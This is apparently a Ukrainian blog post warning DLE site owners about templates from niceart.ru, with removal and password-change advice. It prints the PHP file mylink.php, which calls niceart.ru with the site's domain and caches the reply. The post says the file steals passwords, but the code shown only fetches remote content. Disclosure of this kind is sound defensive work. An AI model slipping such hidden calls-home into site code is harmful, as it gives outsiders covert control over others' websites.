Увага! Якщо ви вебмайстер і будуєте сайт на двигуні DLE, то ніколи не завантажуйте шаблони, файли чи взагалі будь-що із сайту niceart.ru! Адже вони підступним чином крадуть ваші паролі.
Останнім часом на моєму сайті з'являлися дивні написи, пов'язані з якимись системними помилками. Коли я почав пошук проблеми, то зовсім випадково наштовхнувся на деякі незвичайні файли у двигуні свого сайту. У їхньому коді містилися команди пошуку та передачі усіх паролів на сайт niceart.ru. Будьте певні, такі хакерські коди є у кожному файлі з цього сайту! Ось іще одне свідчення.
Для програмістів, кому це цікаво, надаю код хакерського файлу mylink.php, який постійно знаходився у папці engine/modules:
<?php<br /><br />$name="engine/cache/system/site_links.txt"; <br /><br />if(!is_file($name) || filemtime($name)<time()-432000) <br /><br />//691200<br /><br />{ <br /><br />$file_url = "http://niceart.ru/getlink/006/db.php?script_id=" . urlencode($_SERVER['SERVER_NAME']); <br /><br />$mylink = @file_get_contents($file_url); <br /><br />if($mylink) <br /><br />{<br /><br />$file = fopen($name, "w");<br /><br />fwrite( $file, $mylink);<br /><br />fclose( $file );<br /><br />// chmod ( $file, 0777); //права<br /><br />}<br /><br />} <br /><br />else <br /><br />$mylink = file_get_contents($name); <br /><br />?>
Якщо у вас стоїть двигун DLE, то перевірте у себе наявність цього файлу! Також у кореневому каталозі у файлі /index.php потрібно видалити ось цей рядок, якщо він існує:
require_once ROOT_DIR.'/engine/modules/mylink.php';
У папці /engine/cache/system подивіться, чи немає часом файлів на зразок my_site, my_links абощо. У них може міститися крадена інформація з вашого сайту. Подивіться, яка саме інформація була вкрадена, витріть ці файли і негайно змініть усі паролі, які були вкрадені. Найперше змініть пароль адмінпанелі сайту, бажано також FTP та MySql, якщо можливо. Інакше сторонні люди можуть мати несанкціонований доступ до вашого сайту.
18
Переглядів: 235
проте і ображати нікого не збирався 
відповідь